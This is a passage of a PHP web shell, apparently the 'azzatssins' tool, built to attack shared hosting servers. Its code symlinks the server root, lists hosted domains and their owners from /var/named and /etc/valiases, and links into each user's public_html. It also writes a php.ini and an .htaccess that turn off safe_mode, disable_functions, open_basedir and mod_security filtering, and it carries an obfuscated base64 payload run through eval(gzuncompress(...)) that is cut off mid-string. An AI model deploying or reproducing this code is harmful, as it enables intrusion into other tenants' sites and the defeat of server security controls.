  1889. @symlink('/','xazs/azzatssins.txt');
  1890. $pg = basename(__FILE__);
  1891.  
  1892.  
  1893. if(is_readable("/var/named")){
  1894. echo"<title>Symlink</title><body style='color: #12ae00;background:url(http://azzat.wap.mu/files/1049320/IMG_20150725_103425.JPG) repeat scroll center top;background-attachment: fixed;SCROLLBAR-FACE-COLOR: #F1F1F1; MARGIN: 0px;SCROLLBAR-HIGHLIGHT-COLOR: #ffffff; OVERFLOW: auto;'>";
  1895. echo '<table align="center" border="3" width="400" cellspacing="0" cellpadding="0">
  1896. <td align="center"> <font color="white"> <b>_DOMAINS_</b></td>
  1897. <td align="center"> <font color="white"> <b>_USERS_</b></td>
  1898. <td align="center"> <font color="white"> <b>_SYMLINK_</b></center></td>';
  1899. $list = scandir("/var/named");
  1900. foreach($list as $domain){
  1901. if(strpos($domain,".db")){
  1902. @error_reporting(0);
  1903. @ini_set('log_errors',0);
  1904. @ini_set('error_log',NULL);
  1905.  
  1906. $i += 1;
  1907. $domain = str_replace('.db','',$domain);
  1908. $owner = posix_getpwuid(@fileowner("/etc/valiases/".$domain));
  1909. echo "<tr>
  1910. <td><a class='azzatssins' href='http://".$domain." '>".$domain."</a></td>
  1911. <td align='center'><font color='white'>".$owner['name']."</td>
  1912. <td align='center'><a href='xazs/azzatssins.txt".$owner['dir']."/public_html/' target='_blank'>Symlink</a></td>";
  1913. }
  1914. }
  1915. flush();
  1916. flush();
  1917. }
  1918. echo "</tr></table></div></html>";
  1919. }
  1920. if($_POST['azzatssins5']){
  1921. echo ini_get("safe_mode");
  1922. echo ini_get("open_basedir");
  1923. ini_restore("safe_mode");
  1924. ini_restore("open_basedir"); $phi = fopen("php.ini","w+");
  1925. fwrite($phi,"safe_mode = Off
  1926. disable_functions = NONE
  1927. safe_mode_gid = OFF
  1928. open_basedir = OFF ");$phii = fopen(".htaccess","w+");
  1929. fwrite($phii,"<IfModule mod_security.c>
  1930. KillFilterEngine Off
  1931. KillFilterScanPOST Off
  1932. KillFilterCheckURLEncoding Off
  1933. KillFilterCheckUnicodeEncoding Off
  1934. </IfModule>
  1935. "); }
  1936. if($_POST['azzatssins6']){
  1937. $mys =base64_decode('PD9waHAgZXZhbChnenVuY29tcHJlc3MoYmFzZTY0X2RlY29kZSgiZU5yTlBXdFhHN21TbjJmT21mK2c5UGltN2NFWW16eXZqWjJRUUdZNFE0QUw1TjZkeFY1djIyNURMM2EzMDkwT01CbisrOVpEcjM2WVFKTGRjK2NCTGFsVUpaV2tVbFdwSkg3NjBZL2pLQjdHL2lLSzB5QThyNzZvZFg3NjhYWGlwOE81ZHg2TWh4K1hVZW9udzNnWnBzSGNyemF4T0JvTms5U0wweW9tS25Nc0VGM2hYeTltMGNTdnVzS3RpM2t3amlPcVVTTWdncGVBWE9Pc05SQnI2cnM1QUtDSlB3MUNxSCt5UFR3K1BEd0ZMRWxLVFp0NVk4anU5eUhIM1lBZmt5QU9QVUE5SEw3YjI5OGREbXUxQnVRam5ZME5oV1R2WlBpdnZRUEdBZjlWajM0N0doNmVBQUxNcllsWG9pWGFvaWxxRmwxZFpXZnZlUGZ0NmVIeEg4T1QzYVB0NDIzNEZOMnV3QmJrNE44ZXZnZjQ4Y3hMa3FGL0hTUnBVblV4YnlXQlg0L2VRb1h6UEh2UEYyUEpxRW1RREtmTGNBeDhRcWp4OUh6NHlZdXJMdVI3bzVsUFpXa1FoVW0rS2REQnZZTjNoNEM5K3NpUC9mT2c2aXd1RmtFNGpaeTZ4bHJMTm96R0dRZGdPQXZtUWNxais5T1AweWoydmZGRjFZdGo3NmJxRG4vZGhjRndoMGVISjZmUU15OFJGUmlWajBzL1NXdmlzd0d2Nkd5R3VmUnZSTGNISDUrODJkSW4wR0FxcWxUd3VYa3JIZ0ZMaDY3T1orNVFVbFlCSGlSRGJvUkNBdTI3aFhLSlhPSG1YUDVQRWhsZmVESDBqc1p0bVU1Zk1wMEwzNXY0Y2RVWlIySHFoK242NmMzQ2I0dlV2MDQzTHRMNXJDTmt0UzVVV1gvcEVEbmh6eEsvZ0hNVW5EOTdJRTZzY2hmSzg5SGxBekZDamJzUXpqeFkwcTBINGd5U2FQM2x5MmQvWDk5MEpMZHgrZnF6S2JIN1pQZjRuN3ZIWnk0dXA1UGQvWGZ1QUNaVWFYYmJ5ajU1ZTd4M2REbzgySDYvNitKS3IrQ2NBNUV3WHdCU2xoSTA4ZVRZVFNLUVJNeGxiM3k1WE14dmtvOHpWengrTEI1VkV1K1Q3eVhUWU1ZVGFqS0NEb1ZRWlhRUkpXbGR3TWN5OFdQNldNQ3FwQThVRnZBaGU4aGxJTzVvdmFXNHFxQVZOTTJHMDFtd3FISWVsY1orc3B3Qk04WEhxblB5MitHL0JCVWx4QmxzNmlNSlVST0xxcnQxc2Rsekc5VFlJWW5WS3NpbHJRM01KV1RZYUd3S29CdDVDWDFXRFk5K096MDlHdjZHUzJ6UWNJZnZiMDcrc2QvQWJtTlZPWGp1V3psNEtRMmV0MWpNZ3JHSDBtQmpHVjZHMFZWWUNyMFRKSXNvQ1JBT0txVXByTlU1NUhlRWFsRFhiZWpHc1VqSFBreTgxSU9tdWk3a1hGMUFNYzZ1SmZUckNuSzVsMU0vSFYrb0ZTbzVvZGR6a0FDekpUUFBaRTBROUFPR3NHZzBZSm5ENTNLK0lOaXFnYTNwaGMzMHhyTW80YmtDd2paVnN4UEp5VW5UN2JxTWwzanhXUTBTVHdHbUN5TXpUODZ4WTBjem1FbStDTUxGTWhVTTR1ckY5RDBtRnhGSHhxcTlRWFo2UnRNMzM1elRDNTlHUk54RVMzSGxoYW5ZZ1Y3TUltOUNVL1FLWkdvWWhZUUpSaS9iMHN4RWhjWHFqMU9CTlllSXNPcmFkR0dLeU9sclppOWdnSG83eDRkSDRuVDd6ZjZ1MkhzbmR2OWo3K1QwUktUenhkQUx6LzBaMXdLd3Q4ZTcyNmU3RWxBWGk2cVVMR0wvOE9EWE4vdUhiOFRCNGFrNCtMQy9YOU5WOXcrM2Q4VE85dWsyQUwzZDNoZXdZY0VHTGx5bjRVMG1DZXlpRjM2T1NRM0hCYWpUd3dLNWQzdTcrenNuNG5UMytQM2VBYlJuUjd6NUE3WVRMaDErTmhMbWR1aEgwK0hRRmJzbmI3ZVBKSndyOXZjT2RoOVNuZnRReG1mVjcya2N6VTBEVlpjdHBtYkxjQnZqdGZSNjlXSXlZaWE2eXMrWGZSaGZuakJURDM1T1JFNzJaQ2NJQXFJeUFEVVhYbnFCbjFsTzMwdk1YSzlMVVlIMXoxellQZnd3Z1FKMzhFMkNoN0Vwb1poQjVteVB4LzRpWGQvM3cvUDBvaTJjQm1oelVMdGFrU0tDcE1INEloSXl3eElPZ3Y3OTZjZFhQUlFTVzdqUDlmQTNZTWJmY3grRXowV2FMdFpCYXdrK2RaMjMxdDdvcUhIdE9pczJYa1NSQnVuTTc3My9BNFQxMWdZbklEZEpiMkJVa0h1eThqaEpFSHdVVFc3cTZlVHpGREMzUld0emNTMjI0OENiMVUrOWkyanVkV2FneTYxZitNSDVCUlkvWDF4M29QRU5razljcDFnRk44anpPRnFHay9iUDArbTBNNHBpNEJyVUJzQWttZ1VUOGZQejU4ODdDMWhmSUI3YlVMOGpDV3h1U3Z3ZWFHOFdlaGk5WlJ6NHNUandyMENaZkIrRlViSUFCZnhyU0NINlVTbytNK2o2T0pwRmNmdm5VUlAvemVCN01zRi9PeEpnU3Y5MFZuUTUxMzVQZk9acTR1ZG1jOXBCZnE5UC9IRVUwNHh0QTNvL1JzWVNiUHNpK3VUSHVzSzAyU3hVUUJuTGZKbWxMUUdqSlJ1ZlJvdTIxVlhEZ2ZWUmxLYlIzQzZjVENaWmRyWHdYODJhWndEWmFzS1BaL3kvSXJmNXZjajlIZis5bTl3MEdpK1Q3MFVQL3ZHOHUrbmhvdnRPNVB5LzQ3K3J5ZUc4V2IvaVdUS0taaE9idm9DNUhINjJJY0lvbm5zemhBRTdadjU1N3NYblFkaHVhdlJOTExyWUxDdFFNL0VwRUxYWExtVVFqU1Q0MDIrM01DbW45ck0zejE4K2Y0Y29sN01HeWVOWllGQkxvS2RQbnhieDJkOVkvWE4rNHBKMm9GQzhlUEdpTXdVTklHM1AvR25hQWZzUHJPaWI5bWdXalM4N1Y4RUVSR25yR1RDdHc3VFhZMEtPYkVUa1d4c2t3a2lXamVOZ2tkckM3SCs4VHg3bm9reFQ5cWg0ZStHUEw3ZG5zeXF5VWRtRlZiQmRSZEJ0ZG9JdHpHN0Fqb2s3UU5LWWtUanZCR3RyQklwZ3FCZG5nTTZDZ2R6Ly9BYnB6V2d3amk4dXZSbG94U0RsRzJNa0NSdWZyTWRGS3BjM0FLdUJsV293SVdLeG55N2pVRXhnQlNDZEJ0alp1MHp5emMzZUJLRjRlOVkxenlPUFBxcndDM1dsU3RWVldXNnR3UjhOTWtTN2tPamtBWkxsQ0kxcmlSVjRTOHhENW02b3JRaDNCa0U4N3pwNk5wQTJ2QTdERmkzVDlqUzRoajZKSzFnazZ5T1EySmR0K3JrT1BlYWRpSlZFSE5tdTAybzIvK1lJWGxCZHB3bDdtVCtieVhtcjB5alZaWm9ReE96SDZEb28rRGhyMHR2QzlhSmF4aE9LcGtySDZaMTRVeCsyaDRuZjNucTF1RmdJMm9TQmwrUHBlZFZOb0hBNGgwSlFOMS8xb00rQUJsSENoaHY3MDY1akpsRmJjOWVkUmVmUVZWUlFlL3YwdWJYaDljU1hhb0VLNDAzbVFVajFWSTBOYlB0R0d1TVA1QXhyQUE5Z1V1dFprVXRiaUMrbEFjTWVTMWZKSEFkUitVcElmK24yck9ISFlaOTdsLzVGZ0w0eGxkdmhxdE1vU3FYdHkzb2VsNHUvL2hMcUU4MWcwMFdjdjQra1FZSUdzZnBFYXo4YWV6Tk1vR253U05vcUVvWStwUzMzU0Zvb3NvZytvZWpKaytaemx6eFFJMndaWm0yeGFjUnJIOW8vOFVOSEJKTXVPaEZDVUgwZFFVcWNTZklhY0ZxTzJPaTVzbGZLRHVTRzFtajlTQkpnK0RrMmpiNGswaWNxZlllcjlDVVpLODEwK2s1RjUyejArcUZEUzk2bWlOMldkdGE5U1dJZG02Uk1XeVJsVGpsSnRBc2ZTaExyMkNSbDJpSXBjMWFRUkhQem9TU2hUb1lrcDIyU25GTk9rc3pwQjVMRU9qWkptYlpJeXB3eWtsTHhmaGhOV2NrUU5SbWFxc25TWkhIZS92QkZWMVRlRThYcmwxMUhtSjVYbFlNQjVHSUV2MUt3NzZuWXJkM2xaVkJPQnVWalVDNEc3V0c0di9kcWl1NjExOU5vZ2VZU1duMTE5OHBWTmlXVTF2S3VBOWZ5Y2JsZjVlUDZmL0FjcmZBVjFRWDJTRHVNcHV3cmtubGtaUzdqR1hxVXJUTUZlZEpRZDkwNjhZZGtkZFhkZ2Zhak1Tb3V2RVFrU3pCQWswVHcrSXMwRW5vN2t0WXI0RzI0RHJBdGh0MnY2d3hITXk4RTh4QktFU2V5eDJQdTVKMVlaZzRBMFRlTW4yMTV0MmE3dEdtNGdoQm1CUXR0L2dSY1BJQ1gvZzEwQ3Qyek1LdmxWMHF1VlJvQjdaN1gxY2c5cjd6elVNZTQ1bFZDNFd3d3FnYW1rWTJTZ01wMmNwNGJySTZaTkRXNUJYVzNrK21HUkl6ZFlHUzFiMXdEOCtySHFyTjNjTEo3Zk1xZUlwNDNwREFxY2pYeHorMzlEN3NuM0VQTWNQQWd4TjFqbm9iK2xZaFJrWjZJYUtvRzNCVnRrWm5udFd4SGxndVk1bjUyUENpRk0rZjVVMmJqdHd4SW50a0kwSEM2OTJlNUdsSEY1TXJWaFI4cjcvUHpwME8wSFVBblVRM3VmUHN3ZkRqYVFkZWdOUUludTZkNld2N3J0OTFqS09SVzdPKzkzenNWTFI2SFkyWStzUlRrN1pkWWI0VHl4SmZDMkdiNkY3dFpnV3ArNmcrUjg3Q0Y3T3p1NzBLcjN4MGZ2cmViYmpmWCtRN011UThaNHNZT3RnNVZ2M3ZQU2NrWGc1UlVPOE9sT0ZxNDM3ck9rRUxXbjJub09UVzE1ZTBBS2Q1QTdHYWJ2VXFlZjdodVR2eXRHRzZvSnB1U3FGMnU2cUordmVOUFBkZ3pZSzdqcVJsay9Qcm1kendlcG1NNVNMN0IzM1Y1OUFmcEQ2ZnYxbDlpaGp3VGc2eDllVHJXS2RQanlaZUhVT1RiRSsrOTBEdjM0eFhhZk4yMlFYNzZFYmZKTVZpVFBsZ0xpNTdLMm5ramZrTk52ZTBxSEtTNTVBMEhIaGxFR2Z5Skdadk51a3ZLQ254ckhWb1N5U0QvZ0NyK0Y1SGpjSzlFenVweUdmSWptQjFmUm81emFDVnlWb3l6eUZmaWtoYUZhekNnVTFsbW9hNkhPV3hYUXdiWnJaZ3pTbDFOWW1NQnRwOGNocUs5OWVwQnZnMS9FcVM4R0tzODVIVXBYT3BDejJwMTJtU1piU2lkakc0SWZab0dNYXlSdlVSRXNRaVNzTyttWXBKZDdLK2dBNElkRlBLTW9PcHl5U3lBYVZGcjBLbzJ6Z2FvMlNrQ2NlTWtGQ2RLb0hUVEphQk9sOEJtZlJpYU1XRGhzOGlvV2tkc2VMS2trcm9yZ0JCV3NUeGxnMjZNTE1LY0tBS3RJQW9nclB6cEJ0ZUpLL1VGckZIZEFqTXdwaEU0RGdUS0d3VlJreXA1aHJIMGJUWlJqVGRiQTdObEJmelU0MldCZklIRkZ1UnFKOUdYWEEzMk9HWEZFM1hEdlkvSU11VThXM0tadXRsU0pFZ0RyTVNMc2JxWjFzRGVUNGhhUkFxbnVGWWZSN3BkdHc5cmplVDhneHV6aWkwbUgyY0RXUlRuL3FvQnlUVzBNZ2FGMEdmRFMyOTB0R3Npa25DSjdwZ25UWldHUkJDbU1LT3FtZ2FlZ0p0cFN0RldITk1Ec0Z3aTFrV3JKbjRSQ21QMmVEQmJ3NmJVTXVzZzY4bEJKU1ByYWNua2tMeTNjcVJJcjMyZnNBM1NGejZSVTR0VkJ3eVdBZ3lRTmFTelRiUFRVQ2lGQUd0TTFXbTRJbDZHSVdwSFFZZ0YzQXJJQmpXY2t0aVdodnZhS3NMdGhOV1lpK0Q4Z2dtYlJ2U0UrN1RSY2xWc0ZRL3B4NlVmMzFpaEkzanUvV2I3WlBlRVQ1SW5vOXhJUThiWkFIV2o5WFZ4d2tmTG5wZ29VM1I5WFZ2VHlMWnlRNXBJYWg5SmNnWS96clExNnc0UWV5NkxCeGRuS0o5bUYvUWY2Y05JOGcxcXd4b3hPLy9aQUpMUmd0WU83ZllKckNDcUFyWXNaZEJndWxFSW94bWVVeTJ6ZDZRWFFkTGcyc2taSlZUZHZYRGlYdzlZZU5hUW9uK0ZCeU5RdlZVelNpV3h3M0NTYlFRakxMTGF6TnRsSE9OeC9RUzZRUjBSWmU1bDA3aStTOU9BaExqYkp5ZXpsYUZ0KzZ3Q3J1aUt2NFNpZDRwbDVjVDBoa2Eweko1aHlGbDU1T0UrZXlpZXV1aTdiRzR5VHJaOENkZGZYNE1MN0xubEdIWlZuOUhoaFBwNlpHaWZTRHp3UlhnR1NxSkxWYzd5bi9EY0dFNUdlcEI1dllFRUFMSEdOaDNaRnhWWTVXb1JOdFVRSVFaZUp1ejhNaUJTMEZXODJTeTZRbzNQcnBZeHJSN2xzZWdrbXBNbllPZTlQUVZKbTdQMHlFUzNHMm1xZFhJNFRLTGhTRXZabHRCMUxjUUpwOTNnbHVFYXVVaDVQeU5YRmNid29aOXE3cWNYMGFUcllEaW5vNWNGckpEczhjaG1zL21nSXlSNU9DTEdFV1lEeVUybmQ3d01CUXBmNnNvRy9neGdmd01WVG9zMWF5bTFyVU1iZWRDeWhVbzV4aWZJZ3diTkZrZWZWVUdobzg2bitGenplYk5wamt2cGpCUFAvS2ZBbzdhM1RDTmFVQmpOa1N6OGNlRE5hSHV4NWtWOTkrQjArSThQaDZlN0orVGFWRTNvY2ZQd0NKbXA2WE5nT25RR0JyQW5XalpzbE9wbTJVMVJSeWFzN2puUzlsQXBlWDd5RCs3aVJxOTRqR1hXUW9rV1VyZG0yNFBWR2xwb21DaVRaM2dnVlRXTGhkemZlZ2tZOTZGeE9XajU0QmFjekx3YnZqM2MvL0QrNEtTd1NEaktLcnJLeVhTNThkM0xoY3pWYVMvRlQ3TWllSDZ2bXROUGluTmFMdzV6T0lyS3BGMHc2YjBML05tRVJzck94UmlpUXViQmNqWXJaUDd1M3hUeXBIdWprTDk3bmNaZU5oZG5oMUlwMGEwb3FwSjk2RlBVWVdPNHE0NHdiR3gwWGkxMkNvVXlBYUI4aU1KNUJBb1FMaHF3aW5FM0pxZ0RPa0p4S1c2azczWU0zREl0QWJNd0luQ21FMUNHTG51WEdJZlJyb1Z1S2doazRwMEF5RkFFZUJ5T2trVm5KUml3K0I1UXlxZjBaVWdhaGxWd2VrQmcxcVVqcmVSYk1kcG1tZkNXN05KNXI4bEZXZTZ1T0p6SnJCdDdNNjFaaHkxZnYwd3FjVktpUytYYnE5V3FpODJlNVVOSDFVeXExTlllTDkyQmoyUHY0ekxxbUxNaVkzMUlUQi9Zb3k2OW52ZkdjdzkvYjBiNnJOaWVWN2luTzRvbmR3WnAybHV1Mmw4WFlEZzRKUnR3N3k2VDhrdm11U1hzczBQLzlmTHRMcmxCd3grRElXRXYySUUrbnFBckdzVzl0RmdoYTJ5cW1xNDhxUGkza2s1Ym96SUJOWUw4R0tNYXlpUlRWbFhKYUNhODIrdURuck1DNmtGT2UzbG1heS9QeTdVWFptQ0pjbUtMbmkrc1hKdTl5SFdjbUhuMXJhalJaTlVWdTNOYWVkbVR5WTFDbXpMci9mdlI1NE00VGYrRFRCYm9GM3hjZFdISkNHVnFLRFhMYUVMV3hDVjlCNFhCYTMzWnJRTUwwYWhDOXVtZUJNYmxCSm82R01IR1lLQ3hNY2xGMVVIMWU5UWp4ZS9uendoL0t6RFd1YmkyaWpxcVE3TVQ5RUlTVnNsVkFCS3ErdEY0QTM3NkVVaU1VZGx1dHJXczNjV1RGaUJ4eDFrK3haZDFaTlZXbTFzTmVsMGFvYmtSVjJFVThHS2RiRkd6M25vQyt3cnBmdXdyK0lVaTR1VStWbUtqRUJPMFBTVFZGQSt3YTJFTEpVTllMVW4xb3czSS9oOFF2SUgwVU5GM2xlc2EwMGgrNVhYaTIweWtocmtXZ3ZSby84cEdDTENrZC9xeFV4ZE9QNlNmcVZPcnE3TW92T3VvZmtCdUdnZno2b3BCcThtYmtJYlFJdmJQTlNWbm83L1IvK1hzdjZyOVgvb2J0Y0V2K0dzalFJSUNmdWhxSkttdzN0eWpuV2cyZzVySTZINnk5dCtmWVJSdXEyZjlxOEZhalJPUWkwaDA5WHFGNnZsSjRVaE9GWnkxQmh4RmY1dmRPQ3Q2aHNQV3Bkbi9iVnZQU3RXYTVvYWVNeHg1QW90NW0zWkhvMjVWcGloRzJUMzYyc3daeWszcy9SbERVU3NZaDFvSnRuUWxTS3l0VVR5YVpJRzZpSUhsUTc2ZXhTaUEvd0V6RE9SUEhoRHpDb0RBMWp3Y1gxcklnT0hDQjVrWFJsZXh0K2hSTTJDYjRhRExYb1VSUTdXYWpKK2tqanNaYVNWbG16U1A1bUhoT2ttU1JHT2o5LzNibUFKYWFaTkJDNVZScXhBZUFiMlJjUkVnUEdHWEFkbXREdGxVMGpydnZ6dE1Rc0xuSWlYRTlzR09VRW9JdEtDQlFZOW1RTmhQTUJ6UGZDODBLREpLdjZ5YlUwSDlrRlZReWw0OW54V2RNcGVaZGVUWUo0T0FYV1hBVEVLcVhHZGwvc0pkZ0w3REdaZkJQUEZuOTBlODQ4OFFyMjN1QU5jS2RzOHlKSWMvbDJTTm9Mem95T3d4bTIzY0tJeEwzNXRPeVFuTWU0QWlBOXVUS2hCWUFKc1lxMnhlTEJXMXdnNTJhLytYMjgwdGx3UkhOWnljYnA5K2tENTY0c0NRNVl0TUVFbDBvM3VwTjhTVGJuVmNVdWFKbHN0U1JlbDl5V052b2JRU2E1STB1KzJISERrdnI5Rm1tbVNsVEoxalNGckFPU1M0MndHTmNiUU1kY0JkRmlMTGg3VTFxNnRzT2xKQ0xnTzdCeFplblczTkRoMmwrT1hkbzNuSDd2RUFKK2VEdldGM09IMjBrL1J2WU9ITmduTWd6cUVHV21tVmtkRjBKVUhycGxHb1ZGaTZwRENLcmxGMmptZkIrTExyNkFzVUpFR3BJVnFMelRpUmNKZklaK0l3RjcxSVppQUxaVzloYmFRK1hmNHZsTEVLblNzakVTWVB2NHdWTWVudGh1ZWdWeFR4UjdPWmw5MnRiMWM2ck5UYXNjUGdUQ1R0djVONW1CdHRheDcwTXRIeVpueDVJdkRTR3VpWm9NVHJtWHRBTng2eDdTVmpmYy9ERklNbGUySms4aDkyYW1Uait4NG5SM2w4dWRPakU1WDhOcXhseDBobExyeU1aQ3gzTHBaSndqc2hyZVgwQlVocmNXVWhWeTB3VTVXWDJwZGFvaFplRnU2MjZKek1MQ05saFdld3JuQ0Rua2FwTjVOaDRtM3RwY1A5NFk2VzBjWlVYcTczaDJLeDhRZTREYzBkOFVvOGhXMS9rNXdHZDdwZ1NjRldYZXc3RG5mUzZXZDlEVmhnSTM4SnlKOUxNRXVhOXgwVDhtOWRJV2oxSFhYOVFLMTZ1azBnVGdBYVJScmQwYzc0TXZvT3BjekZCQXdVdDFBNkRSbVozaWgvSDhJeDcwTVk0dWdMZ2hUeUVWTFBtOXlJSE4xUmFpcXdHOFc2a2hGZGhiRm5YM2JadmFiYlFXelFZK2dWaldRLzYxeHh5bUpjNnBuN0VvV0lGeHdYNldxaDZ0UFlzaSsxcm1ZcGpxOExzZk0vL0NDaitFcXVlb0VhR0UxdStJWWRYL3EyNDZoMDhCb29vd21IZ3RIZE5YZHJFbnhTM3JpUzY3dnl3blB1WnFvNkJteXBxNmQ4MzVOdVo5Sm0wZWE5b25ndDFTSHpnZSt1UTBNNnVoa2IwQTVsV3Bpb3QzRVVYUVkraGJUWEJic0E0ZmNzbUpJS2l1NE9rSm5CTlRwWXFFL25zMmdFeTdSQ0dnNjZRZFNUQm5YOU1rdUhJLzA1Um9ocnY1SVZ6bHltQjluMG1JdnIxdlF0QUVtVGY3K1N2OXU1aXBqSmlpZnNzL0tTbWZVaURQMGVIaDBlbjZJVzJoVlBuejZ4d21kQTJwZDNWM2RpamFqVzg2MzFVRkxuY3lmUjNBTWxEL05sV3dweGpPeENrbTRqUDVhZW8vRXlMdmlRK1BFU3kvMUVSaXZHWDZHZDBOUFZHVkFGVVpHSkVFMm45RFNQZUtiaXE4aVhPUGFER2RmZU1MV3RtQzVDaXNDTWt0NlpZQzlhSmNYM0hMZ3c5OXdEQTZrZWlIVWhxWnRhcW1oTlZMSWdHQ2tteVJPYUxUbWhDdlZhV0FkQk90bG1RYzBxQXN2U0dtQmdFbzhmaTlLQ3hNWnZZaW5Wa1JuVktXV0MzVC9tSjFvK1VaRTFYOXNrUlllUlN5cllkVnRPWmFaRHRjaHphSHVMenN3Wmkrd0podnAvUmJBTS9teWhrdk11aUJQV3cxeTVQZzFwSlBqMTZOMkczWWtXYkxOSTd5ajJQOW5rdEZzTitVT3pRTUQzVnBjR1FGVFUxVzZMT2VpaUNYQ3hhK3dnUElLR3l4aS91ckdJQWh0NHhwOERibVFuUHpRTmUyelVLSDhuTHExcExoMkEzS2VnTUQwbWVHUE1vaWErdnArRWc4bnNlNGxOSnU4U3R4TFl3VVh2Q0t1U3JxWkxaRkFqSVdCbXlZdnhCaVFuSldjUjZKK1lYNldSZlhYWFd5ZXNkc2gzUlhETC9LY2ZUN3pRNjd6WmZ2djdyOGVISHc1MjJ1TG5kL1JQUjc5NThoSjJ6dkozUmZCcGtlekxCSm5EVnJMenRTT0FicTluYnE0WG1nSHpHVFFpdkU3ZkZzcTlhbHZ1QzFtcURIYVRKZ1hMMmVSYjgyVTNwQmtCNlVIYTNpUFdGV3JrNG43Mk5SQWZQMm1sUlQxb3M3SGhoeE43R0RMNmpIL3RqNWNwM29tYytqcDZ3R3hRd2hTQU5GUzE5TE9GV050bFQ5UnIvQ2JvT3FKUVIraUE2bitnVTFVNkIxRUZXa1lYRUNZWC9tdzJ0TkJLSEs5TkFiZm9iaXczU2VyUFZjTXlMMCsrNWpLTlJPRUhJSG82a2QvdlljOGhaZ0x2cEMvM2JwSTQxT2xGdkN3bnFrcS9sZXpySUJsQ3pXZ1pqL0dhS21KWThFMWQ1THNUTzdWYVlSRFpuL2pvOWRTUGNITzJBQnA0MFRmR1FQZkt0TjVxYnFvenpkY0xkUS9XYU5acW1jZXNORmd6Q1BDajQzMFJLK1VsdmFDSFBYbGVPVlNNZWlicDdCSU4zeXhHU1U2LzIxaXVyNlZwekdOc0w5OHRReW5CZm55OG5kdFY5NU81RkM4b005ZW5zRXdTaEtpL3pnVjJFQUxpYnZhUzcyMmU2TVFmTGM4NUd0eFdpUFZicFBkK3ZUUkZnMWNDZ3A0Mjh1TWhMbEF2QmFXaTdERlQzUG8xbFZvZGpFbXQzQi9GRVY2SjgzV0FpMElOMjJBQ0hRd24xYVRtbXFmdFRHZnVkWFd2aTFlWjFTdFYrTTB4ODExKzNrRmZqZ0hsT2J3MFowVXlOcitxdzkzYkZKZUpOWXV4K1RVNyt1Y3R5Tmd3b2tmUUVBTmVqK1o0ZTQ3Rk43NTQ4MkFmamp1UjUvY25yR3REQXFiMmloaGZzblRDeXd4dGZVMWJSWXZUZlcwNnlTNmpteU85NHRxQWl1VlhyQXBDNmFxM1RyNzFhd1Q2R0JndklhcmJoK3JXb1Z5L0ZISjBTaStId2ZZRWRCSVdFaUdiMUYxenZ5RUx3a2QyeWNyeThTekExOGxHUWVqRk54MUhNYWl3eWpHM1pEcXBoMVVmVitpM2RmZGVIVTF3dnYzQ3E1Q1o3S2ZseThyeWVCK3p6eXFYQS92SjFrODFXNDBYRWp2d0VkOFp0dEZMckhUeUhpejBtUjFEWkZVVHlpdnBqbjFRSnlVd28xYXY4NVhGS1NuQVRnYk9QdjZYUi80Yys0TTh2a2NWZ2VmMURydWwrT2M5Sy9iVGZNVTdrQ2lHeUt5Q3dFVkhseTMwUnVkalcyWkRjbTN0YjV2ZGJwT3VIT09UUDZRSjRpdGtaZElIMXNrUmlQZHFoUlZXZWt4Q1ZNTG9pcDVOMERFdE1vUENRQm95OUVQbkNhdXkxTTVOMllxbm5qV0p6bXJvalkweWFJcFdrU0VxTXJzdTFzR1N4VmVrTm9wdGs1LzRrblIyeXNtQ2NxWjhXREJiYkU3UVJrZ25nWHBUS1hhRnpoVGwrUmpEYXg4dyt4RTJDWmM4TFdPSU15eGFidzNxbWZTbWVpYTFzbHpJemdSem02NUVMM3Rtb0ZZeGtRSHNTY1k1NVJ6QTU1NHFuN3pZT0VkMDBJajlnTFVHVWIxVVVGM1J0Ri9sY2c4aU54c3Rhd0JiR2NBLy9DUjdpOXpTYTZDQ3BSQmtHd3pmb0RFc3d3UFZZTFVvcGg0aWVnU0U4aXFoQnFmRmdvUnhyY2lXTWdXTEJzWmVxWWdtME5qSnZ3ZHBzTGRHY2M4MUdtT0Z0aXJMZy9SSXFaSzhONUZEbEZIWjdXeDJMSkZheldpUnFKUGJvSzB5L214bXBuZXpJRGsrbXRaTG1HSjdDcFhJZ1h1RGFwMDg1STU5WDI1aFZGQ29ZQjBQMDhtdzNHNHBnZTZMNW9zbkw1NjJYbTdLTngza29USTVaQ1hRaGdVa2ZvRUV6Q1BNYTRvR1dObS9qdXhwWk9GOSt2TFppK2QzSWlXSUlzYjNxekIrb1kxbHJmdDlsSHUvVngzNzAyK0VlSE9UeXZsdEpqWVdLa2FTUTE4Yy9YYjBuOEZDUHFCWHdkTk1EcUZSWE9aeVVLS0N1UGFERk5LdkN3YlArWi9qYUw2STZhVUdBa08vQmxUaEpUeSttdWhRY0tNZElNYWFvUGR2OE9veGhTd0VNU3BjMENYMTRDeVdkT2tzVmF6M3hLOSsrZzR5OXlHVDYzYzJOdGJXMThUNitzK1BmMjYxbWkwNytFY2pKbDJqMjBOTlEyZWVEYnBLdEgrcXEvZGdFZU5heTRyeHF6N3k1NHRVdGZYeDQrcWpYUE1oSy9NNk0yWFdRTStDRDlsQzdvL0tZcllvWnNqcHF4cFY2elZybjFmMVFEK3ZiZFFzZXByWkZGQnMxcFFmTXdTRFNKZ2lrTXV4bTFNYzJOaERvRW1kRHBod2J0allPdW9KSklLNWMvd0tiNUpuM2dKWG8rZE5KdStveGJJUmRaR0J1eldSM09zOW1JZ1VHaUtyVWs4UnFNREcyNnlva3R4ZUtab0tNd2lmZzBxOU5CaURabWk2cUlmUHVwbUVHeDd5TlZ1bUxrelFFUjBzWFI4UGN4RGdvcVlsRXBZOTZvSTZRd2FMU2pWY0hyQXVJaE80dHphNHNDTWZ2ZU5Xb0kwdW1aSnBQSm5qRlE4bWNtV3F1VWZqcGVnWEZIblAzbXhvdmVPNUtkaU1ndjZ4NDQ2b2RBenJBaHRSWG9xdldtdUlybkQ2MTgrYS9ldW5vLzUxOHhuOC94eitiOXIvTzZwaU5Kc01wVnRieU5nbmE0U1dZWEM5dVJNbHAyZzhWekFsemVhbWRQRkRTbW43ZGprQnZFSnhnNmZqb0xxMjliZUdNdGZTRkpJejl3WSszQUVlVWZ6OVpaNkVMcVdHSWtBbld6ekhRM0xKbmxhK2JPTGQ2S3E1c2d2WWJoTXFWTEZmVnIwZ1hLTGtIcFNVc1gxdnltN0Z4b1pBajE0d05WcElXZmZXWmZlMnRzVG1zNXI0SzhzRDdnYVd0WXBsM0Ewb2JNR205OWRQUDFiTE9vTEZKWFYxVjZDOFNOYjBwdGNUcmVJT3J3VUdUbE5VZjltTXo4NEhLWHRXYXY5S0NrMWt0UW1vVS81MVZTNnA3R3lqT2NKMzlQMXJxdkFEL3RHV2F4YzJWRVp3OW54Z3ZsOE1mdnF4a